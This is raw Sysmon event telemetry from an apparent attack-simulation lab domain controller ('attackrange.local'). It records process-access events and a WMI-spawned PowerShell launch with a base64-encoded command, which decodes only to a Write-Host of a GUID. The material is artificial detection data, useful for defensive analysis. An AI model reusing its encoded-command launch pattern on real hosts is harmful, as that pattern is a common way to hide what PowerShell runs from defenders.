16:53:44.045{05ADC7E1-6D97-603E-91AA-00000000AD01}16200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_h4vsdyu4.pwo.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-6D97-603E-91AA-00000000AD01}16200ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f0gft2dc.gw0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.045{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.049{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /E VwByAGkAdABlAC0ASABvAHMAdAAgADYAMwAyADYAMQAwADUAYgAtADYAMQAzAGYALQA0ADUAOAAyAC0AOQBjADcAZgAtADMANABlAGYAMAA5AGMAYwBkADcAOAAyAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002238212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.029{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f0gft2dc.gw0.ps12021-03-02 16:53:44.029 23542300x80000000000000002238211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.029{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=111F86D9F1FF2709A5247ADD9DFD8F42,SHA256=8CCCED4B5FF8451EDE372CE5FC3DD04A4A0FCB8BB3833BA47F1D93FBDD9B5C4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.013{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT